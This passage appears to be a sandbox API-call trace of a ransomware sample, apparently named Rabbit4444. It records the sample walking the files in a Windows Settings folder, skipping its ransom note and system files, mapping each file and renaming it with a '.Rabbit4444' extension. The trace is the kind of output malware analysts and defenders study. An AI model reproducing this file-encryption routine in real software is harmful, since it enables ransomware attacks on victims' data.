hTemplateFile=0x0) returned 0x278 [0056.664] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.664] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14797456965) returned 1 [0056.664] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1087) returned 1 [0056.664] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0056.664] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0056.664] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x740, lpName=0x0) returned 0x298 [0056.665] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x740) returned 0x70000 [0056.666] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.666] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0056.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.666] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0056.666] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0056.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0056.666] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14797707897) returned 1 [0056.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0056.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0056.666] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.667] CloseHandle (hObject=0x298) returned 1 [0056.667] CloseHandle (hObject=0x278) returned 1 [0056.667] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkWorkplace.settingcontent-ms.Rabbit4444") returned 178 [0056.667] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkWorkplace.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkworkplace.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkWorkplace.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagenetworkworkplace.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.667] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec8ad1, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x6ec8ad1, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23969bec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms", cAlternateFileName="AAEEC3~1.SET")) returned 1 [0056.668] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.668] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.668] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.668] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms", lpString2=".") returned 1 [0056.668] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms", lpString2="..") returned 1 [0056.668] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms", lpString2="windows") returned -1 [0056.668] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.668] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.668] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms", lpString2="boot") returned -1 [0056.668] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.668] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.668] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms" | out: lpString1="AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms") returned="AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms" [0056.668] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.668] lstrlenW (lpString="AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms") returned 50 [0056.668] lstrlenW (lpString="Rabbit4444") returned 10 [0056.668] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.668] lstrlenW (lpString=".dll") returned 4 [0056.668] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.668] lstrlenW (lpString=".lnk") returned 4 [0056.668] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.668] lstrlenW (lpString=".ini") returned 4 [0056.668] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.668] lstrlenW (lpString=".sys") returned 4 [0056.668] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.669] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagepcsystemautoplay.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.669] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.669] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14797953320) returned 1 [0056.669] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1087) returned 1 [0056.669] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0056.669] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0056.669] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x740, lpName=0x0) returned 0x298 [0056.670] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x740) returned 0x70000 [0056.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0056.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0056.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0056.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0056.671] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14798194490) returned 1 [0056.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0056.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0056.671] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.671] CloseHandle (hObject=0x298) returned 1 [0056.671] CloseHandle (hObject=0x278) returned 1 [0056.671] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms.Rabbit4444") returned 178 [0056.672] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagepcsystemautoplay.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagepcsystemautoplay.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.672] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72cea88, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x72cea88, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x444, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPagePCSystemBluetooth.settingcontent-ms", cAlternateFileName="AA6CEB~1.SET")) returned 1 [0056.672] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemBluetooth.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.672] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemBluetooth.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.672] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemBluetooth.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.672] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemBluetooth.settingcontent-ms", lpString2=".") returned 1 [0056.672] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemBluetooth.settingcontent-ms", lpString2="..") returned 1 [0056.672] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemBluetooth.settingcontent-ms", lpString2="windows") returned -1 [0056.673] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemBluetooth.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.673] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemBluetooth.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.673] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemBluetooth.settingcontent-ms", lpString2="boot") returned -1 [0056.673] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemBluetooth.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.673] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemBluetooth.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.673] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPagePCSystemBluetooth.settingcontent-ms" | out: lpString1="AAA_SettingsPagePCSystemBluetooth.settingcontent-ms") returned="AAA_SettingsPagePCSystemBluetooth.settingcontent-ms" [0056.673] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemBluetooth.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.673] lstrlenW (lpString="AAA_SettingsPagePCSystemBluetooth.settingcontent-ms") returned 51 [0056.673] lstrlenW (lpString="Rabbit4444") returned 10 [0056.673] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.673] lstrlenW (lpString=".dll") returned 4 [0056.673] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.673] lstrlenW (lpString=".lnk") returned 4 [0056.673] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.673] lstrlenW (lpString=".ini") returned 4 [0056.673] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.673] lstrlenW (lpString=".sys") returned 4 [0056.673] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.673] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemBluetooth.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagepcsystembluetooth.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.673] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.673] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14798426235) returned 1 [0056.674] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1092) returned 1 [0056.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0056.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0056.674] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x750, lpName=0x0) returned 0x298 [0056.675] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x750) returned 0x70000 [0056.676] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.676] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0056.676] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.676] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0056.676] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.676] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0056.676] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.676] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0056.676] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14798723647) returned 1 [0056.677] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0056.677] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0056.677] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.677] CloseHandle (hObject=0x298) returned 1 [0056.677] CloseHandle (hObject=0x278) returned 1 [0056.677] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemBluetooth.settingcontent-ms.Rabbit4444") returned 179 [0056.677] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemBluetooth.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagepcsystembluetooth.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemBluetooth.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagepcsystembluetooth.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.678] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76884d4, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x76884d4, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23969bec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPagePCSystemDevices.settingcontent-ms", cAlternateFileName="AACA0F~1.SET")) returned 1 [0056.678] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDevices.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.678] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDevices.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.678] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDevices.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.678] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDevices.settingcontent-ms", lpString2=".") returned 1 [0056.678] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDevices.settingcontent-ms", lpString2="..") returned 1 [0056.678] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDevices.settingcontent-ms", lpString2="windows") returned -1 [0056.678] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDevices.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.678] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDevices.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.678] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDevices.settingcontent-ms", lpString2="boot") returned -1 [0056.678] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDevices.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.678] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDevices.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.678] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPagePCSystemDevices.settingcontent-ms" | out: lpString1="AAA_SettingsPagePCSystemDevices.settingcontent-ms") returned="AAA_SettingsPagePCSystemDevices.settingcontent-ms" [0056.678] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemDevices.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.678] lstrlenW (lpString="AAA_SettingsPagePCSystemDevices.settingcontent-ms") returned 49 [0056.678] lstrlenW (lpString="Rabbit4444") returned 10 [0056.678] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.678] lstrlenW (lpString=".dll") returned 4 [0056.678] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.678] lstrlenW (lpString=".lnk") returned 4 [0056.678] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.678] lstrlenW (lpString=".ini") returned 4 [0056.678] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.678] lstrlenW (lpString=".sys") returned 4 [0056.678] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.679] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemDevices.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagepcsystemdevices.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.679] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.679] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14798950175) returned 1 [0056.679] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1082) returned 1 [0056.679] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0056.679] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0056.679] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x740, lpName=0x0) returned 0x298 [0056.680] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x740) returned 0x70000 [0056.681] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.681] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0056.681] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.681] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0056.681] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.681] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0056.681] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.681] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0056.681] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14799216764) returned 1 [0056.681] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0056.682] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0056.682] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.682] CloseHandle (hObject=0x298) returned 1 [0056.682] CloseHandle (hObject=0x278) returned 1 [0056.682] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemDevices.settingcontent-ms.Rabbit4444") returned 177 [0056.682] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemDevices.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagepcsystemdevices.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemDevices.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagepcsystemdevices.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.682] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79cf87f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x79cf87f, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a0254b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms", cAlternateFileName="AAD2D6~1.SET")) returned 1 [0056.682] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.682] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.682] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.682] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms", lpString2=".") returned 1 [0056.682] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms", lpString2="..") returned 1 [0056.683] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms", lpString2="windows") returned -1 [0056.683] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.683] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.683] lstrcmpiW (lpString1="AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms", lpString2="boot") returned -1 [0056.683] lstrcmpiW 